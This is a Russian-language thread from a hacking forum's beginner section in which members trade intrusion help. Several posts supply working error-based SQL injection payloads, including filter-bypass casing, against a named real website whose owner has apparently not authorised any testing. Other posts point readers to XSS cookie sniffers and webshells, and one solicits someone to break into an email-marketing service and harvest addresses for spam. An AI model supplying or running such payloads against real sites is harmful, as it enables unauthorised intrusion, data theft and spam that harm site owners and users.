HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 10.05.2015, 22:00
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от tiger_x  
tiger_x said:

Может глупый вопрос. А где сниффер взять?
вот, например:

http://www.truehackers.ru/articles/p...sniffer-na-php

да любой из гугла можно взять по "xss sniffer"
 
Ответить с цитированием

  #12  
Старый 10.05.2015, 22:06
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

http://mr.lumbolka.ru/ru/index.php?id=-100+union+select
+user()+--+ -
403 Forbidden

Подскажите пожалуйста как сделать что бы запрос прошёл. Кодировал url кодировкой , делал бувер оферфлов но всё равно не проходит.

Код:
Code:
http://mr.lumbolka.ru/ru/index.php?id=100+and+extractvalue(1,coNCat(0x3a,version()))
так же пройдет UnIoN, только я вывод не нашел.
 
Ответить с цитированием

  #13  
Старый 10.05.2015, 22:07
tiger_x
Guest
Сообщений: n/a
Провел на форуме:
7357

Репутация: 7
По умолчанию

Цитата:
Сообщение от faza02  
faza02 said:

вот, например:
http://www.truehackers.ru/articles/p...sniffer-na-php
да любой из гугла можно взять по "xss sniffer"
спасибо
 
Ответить с цитированием

  #14  
Старый 10.05.2015, 22:12
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от faza02  
faza02 said:

Код:
Code:
http://mr.lumbolka.ru/ru/index.php?id=100+and+extractvalue(1,coNCat(0x3a,version()))
так же пройдет UnIoN, только я вывод не нашел.
Спасибо, такое наверное прокатит, там кодировка сбита, трудно будет искать вывод в исходнике.

Всё спасибо . Смотри

Код:
Code:
http://mr.lumbolka.ru/ru/index.php?id=100+and+false+and+extractvalue%281,coNCat%280x3a,version%28%29%29%29+--+%20-
 
Ответить с цитированием

  #15  
Старый 11.05.2015, 01:58
Mister_Bert0ni
Guest
Сообщений: n/a
Провел на форуме:
35015

Репутация: 57
По умолчанию

Цитата:
Сообщение от Arboretum  
Arboretum said:

Наверное многим тут есть что спросить... Спрашиваем тут, знатоки заходят и отвечают. Мой вопрос, существуют ли html шеллы?
Увы HTML это не серверный язык а всего лишь язик гипертекстовой разметки...Так сказать визуализация страницы...SHELL-ы есть под те языки на которых работают WEB-сервера.На сегодняшний день мне известны asp aspx cfm jsp perl php - шеллы...Для примера можно заглянуть в /usr/share/webshells если пользуешся Kali Linux..
 
Ответить с цитированием

  #16  
Старый 11.05.2015, 02:09
Mister_Bert0ni
Guest
Сообщений: n/a
Провел на форуме:
35015

Репутация: 57
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

http://mr.lumbolka.ru/ru/index.php?id=-100+union+select
+user()+--+ -
403 Forbidden

Подскажите пожалуйста как сделать что бы запрос прошёл. Кодировал url кодировкой , делал бувер оферфлов но всё равно не проходит.

http://mr.lumbolka.ru/ru/index.php?i...rrent_user()))
 
Ответить с цитированием

  #17  
Старый 11.05.2015, 02:23
vBr
Guest
Сообщений: n/a
Провел на форуме:
5132

Репутация: 0
По умолчанию

Вопрос,

Можно ли взломать сайт -и сдампить Полностью Шаблон, и движек?
 
Ответить с цитированием

  #18  
Старый 11.05.2015, 02:38
Cthulchu
Познавший АНТИЧАТ
Регистрация: 22.11.2007
Сообщений: 1,822
Провел на форуме:
4468361

Репутация: 1549


Отправить сообщение для Cthulchu с помощью ICQ
По умолчанию

Цитата:
Сообщение от vBr  
vBr said:

Вопрос,
Можно ли взломать сайт -и сдампить Полностью Шаблон, и движек?
если в процессе взлома вам какм-либо удалось получить доступ к файловой системе, то да, вы имеете такую возможность.

Ваш К.О.
 
Ответить с цитированием

  #19  
Старый 11.05.2015, 16:04
vBr
Guest
Сообщений: n/a
Провел на форуме:
5132

Репутация: 0
По умолчанию

Вопрос,

Раньше FireFox в гугле вобью что нибудь и бегаю по ссылка нажимал левой кнопкой мыши -влкдака открывалась отдельно, сейчас переходит сразу же по ссылки т.е не открывается отдельно, в настройках в Мозиле в разделе Влкдаки все проверил не че не нашел, не обновлял не менял фф, как это исправить? хочу как раньше что бы открывалась сразу новая вкладка,
 
Ответить с цитированием

  #20  
Старый 11.05.2015, 16:07
Johnydriver
Guest
Сообщений: n/a
Провел на форуме:
5690

Репутация: 0
По умолчанию

Есть кто-то к кому можно обратиться чтобы взломал джаст или смарт сервис рассылок и достал оттуда свежые емейл адреса? (не для продажи, а для личного использования - спама)

Если да, подскажите к кому?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ